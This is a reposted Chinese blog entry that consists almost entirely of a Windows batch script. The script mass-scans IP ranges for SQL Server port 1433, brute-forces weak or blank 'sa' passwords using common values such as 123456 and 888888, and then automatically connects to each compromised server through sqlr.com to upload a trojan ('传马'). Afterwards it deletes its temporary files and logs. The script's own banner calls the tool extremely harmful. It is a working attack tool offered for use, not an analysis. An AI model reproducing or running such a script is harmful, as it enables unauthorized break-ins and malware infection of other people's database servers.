1433扫描dos命令

start xiaofeng\a.bat
@echo off
color 0A
echo +==============================================================================+
echo +             此1433端口扫描弱口令自动传马 .              +
echo +                           →   ←                                  +
echo +                      QQ:18676896                        +
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
color 0a
Title 自动扫描传马器 ---
@echo off
echo +                        [1433自动抓鸡传马工具]                                +
echo +       1.SYN方式扫描IP----------------------------2.TCP方式扫描IP             +
echo +                   [本工具危害性极大,请勿非法使用!]                          +
echo +==============================================================================+
:xuanze
set choice=
set /p choice=请输入扫描方式:
if not "%Choice%"=="" set Choice=%Choice:~0,1%
if /i "%choice%"=="1" goto sql
if /i "%choice%"=="2" goto sqlnt
echo                                   输入错误,请重新输入
goto xuanze
echo=================================================================================
echo                  输入完IP后,按任意键开始扫描,扫完会自动打开结果
echo=================================================================================
:sql
echo=================================================================================
set /p startip=请输入你要扫描的开始IP:
set /p endip=请输入你要扫描的结束IP:
echo=================================================================================
S syn %startip% %endip% 1433 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
xscan -file s.txt -sql -v -p -t 300,100
del log\s_txt_report.htm /q
del log\s_txt_report.rlg /q
del result.txt /q
del s1.txt /q
del s2.txt /q
del s.txt /q
cls
echo ================= 提醒您!开始急速扫描弱口令啦!======================
FOR /F %%i in (log\s_txt_report_hostlist.txt) do @scansql %%i
FOR /F "eol=; tokens=1,2,3 delims=:" %%i in (scansql.txt) do @echo%%i %%k >>sql2.txt
FOR /F "eol=; tokens=1,2 delims=]" %%i in (sql2.txt) do @echo %%i %%j >>sql3.txt
FOR /F "eol=; tokens=1,2 delims= " %%i in (sql3.txt) do @echo %%i %%j >>sql4.txt
FOR /F "eol=; tokens=1,2 delims=/" %%i in (sql4.txt) do @echo %%i %%j >>sql5.txt
findstr "[NULL" sql5.txt >null.txt
findstr "123456" sql5.txt >rkl.txt
findstr "1234" sql5.txt >rkl.txt
findstr "123" sql5.txt >rkl.txt
findstr "sa123" sql5.txt >rkl.txt
findstr "888" sql5.txt >rkl.txt
findstr "888888" sql5.txt >>rkl.txt
findstr "88888888" sql5.txt >rkl.txt
findstr /c:"sa sa" sql5.txt >>rkl.txt
FOR /F "eol=; tokens=1,2 delims= " %%i in (null.txt) do @echo %%i %%j "" >>rkl.txt
FOR /F "eol=; tokens=1,2,3 delims= " %%i in (rkl.txt) do @echo sqlr.com %%i %%j %%k ^<ca.txt >>%%i.bat&start /MIN %%i.bat
echo 正在连接并传马,请稍后……
ping -n 1 127.0.0.1
FOR /F "eol=; tokens=1,2,3 delims= " %%i in (rkl.txt) do @del %%i.bat
del sql2.txt sql3.txt sql4.txt sql5.txt null.txt scansql.txt rkl.txt
exit
:sqlnt
echo=================================================================================
set /p startip=请输入你要扫描的开始IP:
set /p endip=请输入你要扫描的结束IP:
echo=================================================================================
s tcp %startip% %endip% 1433 1000  /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
xscan -file s.txt -sql -v -p -t 300,100
del log\s_txt_report.htm /q
del log\s_txt_report.rlg /q
del result.txt /q
del s1.txt /q
del s2.txt /q
del s.txt /q
cls
echo ================== 作室提醒您!开始急速扫描弱口令啦!======================
FOR /F %%i in (log\s_txt_report_hostlist.txt) do @scansql %%i
FOR /F "eol=; tokens=1,2,3 delims=:" %%i in (scansql.txt) do @echo%%i %%k >>sql2.txt
FOR /F "eol=; tokens=1,2 delims=]" %%i in (sql2.txt) do @echo %%i %%j >>sql3.txt
FOR /F "eol=; tokens=1,2 delims= " %%i in (sql3.txt) do @echo %%i %%j >>sql4.txt
FOR /F "eol=; tokens=1,2 delims=/" %%i in (sql4.txt) do @echo %%i %%j >>sql5.txt
findstr "[NULL" sql5.txt >null.txt
findstr "123456" sql5.txt >rkl.txt
findstr "12345" sql5.txt >rkl.txt
findstr "1234" sql5.txt >rkl.txt
findstr "123" sql5.txt >rkl.txt
findstr "sa123" sql5.txt >rkl.txt
findstr "888" sql5.txt >rkl.txt
findstr "888888" sql5.txt >>rkl.txt
findstr "88888888" sql5.txt >rkl.txt
findstr "test" sql5.txt >>rkl.txt
findstr /c:"sa sa" sql5.txt >>rkl.txt
FOR /F "eol=; tokens=1,2 delims= " %%i in (null.txt) do @echo %%i %%j "" >>rkl.txt
FOR /F "eol=; tokens=1,2,3 delims= " %%i in (rkl.txt) do @echo sqlr.com %%i %%j %%k ^<ca.txt >>%%i.bat&start /MIN %%i.bat
echo 正在连接并传马,请稍后……
ping -n 1 127.0.0.1
FOR /F "eol=; tokens=1,2,3 delims= " %%i in (rkl.txt) do @del %%i.bat
del sql2.txt sql3.txt sql4.txt sql5.txt null.txt scansql.txt rkl.txt
exit

猜你喜欢

转载自www.cnblogs.com/klmyoil/p/9190765.html